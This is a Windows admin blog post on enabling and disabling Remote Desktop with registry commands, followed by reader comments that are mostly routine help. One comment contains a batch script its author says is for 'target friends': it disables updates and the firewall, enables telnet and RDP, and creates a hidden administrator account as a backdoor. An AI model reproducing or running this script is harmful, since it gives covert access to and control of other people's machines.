Enable remote desktop from command line (CMD)

by admin on October 2, 2010

Remote desktop can be enabled/disabled by opening My computer properties and then by changing the settings in the ‘Remote‘ tab. We can do the same by editing registry key settings. This is explained below. Remote desktop is also called Terminal services or TS or RDP. This is an in-built remote desktop software for Windows users.

To enable remote desktop.

  • Open registry editor by running regedit from Run.
  • Go to the node HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server
  • Change the data of the value fDenyTSConnections to 0.

We can enable remote desktop from windows command line by running the following command.

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

To disable remote desktop we need to run the below command.

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 1 /f

Reboot or logoff is not required after running the above command. I have tested this on Windows XP and Windows 7 and it has worked fine. It would work fine on Windows Vista too.

To enable Remote assistance:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fAllowToGetHelp /t REG_DWORD /d 1 /f

Relevant Posts:
Run command for Remote Desktop
Remote desktop and Terminal Services : Frequently asked questions

Additional Reading...

{ 15 comments… read them below or add one }

Brian May 11, 2011 at 6:25 am

Thanks for sharing this.. I want to enable and disable remote desktop to test a scenario. I need to do this repeatedly so was looking for command line way of the same.

Reply

Jo August 23, 2011 at 2:21 am

Thanks so much! This was very helpful. One hint to those that follow – I found that if I copied & pasted directly from this page – the ” symbols were corrupted and gave me a different character set which did not work in the bat file. You have to either paste as text or delete & retype the “s.

Reply

admin October 25, 2011 at 1:50 am

Thanks Jo for pointing that out. Now I have placed the commands in a code block ; copy & paste would work fine.

Mike October 24, 2011 at 7:10 pm

How do you go a step further and add in the trusted users/groups for remote desktop? It puts in administrators by default, but I have to manually go in and add “domain users” to each machine.

Reply

admin October 25, 2011 at 1:30 am

Option 1:
You can run the below command for each user you want to allow to connect remotely.

net localgroup “Remote Desktop Users” Domain\Loginid /add

Option 2:
If you have a group of domain users and want to allow the whole group to do remote desktop on the computer, you can do that as well with a single command. Just replace the loginid in the above command with the group name.

net localgroup “remote desktop users” “group name”  /add

example:

 net localgroup “remote desktop users” “domain users”  /add

Danish November 10, 2011 at 8:35 pm

Thanx for this cool tip it helped me in creating my batch file which maybe dangerous for my target friends… :)

@echo off

REM ****************
REM Disable off "AUTO UPDATE"
REM ****************
sc config wuauserv start= disabled
net stop wuauserv

REM ****************
REM Disable windows xp Firewall
REM ****************
netsh firewall set opmode disable

REM ****************
REM Enable TELNET
REM ****************
sc config tlntsvr start= auto
net start telnet

REM ****************
REM Enable Remote Desktop
REM ****************
reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

REM ***************
REM Create a HIDDEN USER usr= hack007, pass= dani
REM ***************
net user hacker007 dani /add
net localgroup "Administrators" /add hacker007
net localgroup "Users" /del hacker007
reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v hacker007 /t REG_DWORD /d 0 /f
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\policies\system /v dontdisplaylastusername /t REG_DWORD /d 1 /f

Reply

shivam February 12, 2012 at 4:33 pm

great job. thank u

Reply

ddunc June 14, 2012 at 1:50 am

So, i take the given command line to enable or disable the remote access, but it tells me Error: Access denied

what do i do?

Reply

admin June 14, 2012 at 7:48 am

I guess you are not running it from elevated command prompt.

Aditya Malviya June 22, 2012 at 6:35 am

I have a question to
Danish November 10, 2011 at 8:35 pm Feed.

How can we determine target machine? By the code posted by Danish.

Reply

James September 24, 2012 at 11:56 pm

mstsc /v: /f

Where /f = full screen

James September 24, 2012 at 11:58 pm

/v:–specifies the name of the computer to connect to.
/f–starts the connection in a full screen.
/w:–specifies the width of the remote desktop screen.
/h:–specifies the height of the remote desktop screen

eg
mstsc /v: JD2043614 /f

Yasir Abbas July 17, 2012 at 7:51 am

Thank you for your information..

Reply

Abdulmusawwir January 3, 2013 at 1:21 pm

Awesome…
Thanks man…

Reply

Masood Mustufa March 13, 2013 at 8:41 am

How can i add specific IPs to allow remote session?
Regards,
m@s00d

Reply

Leave a Comment

HTML tags are not allowed.

Previous post:

Next post: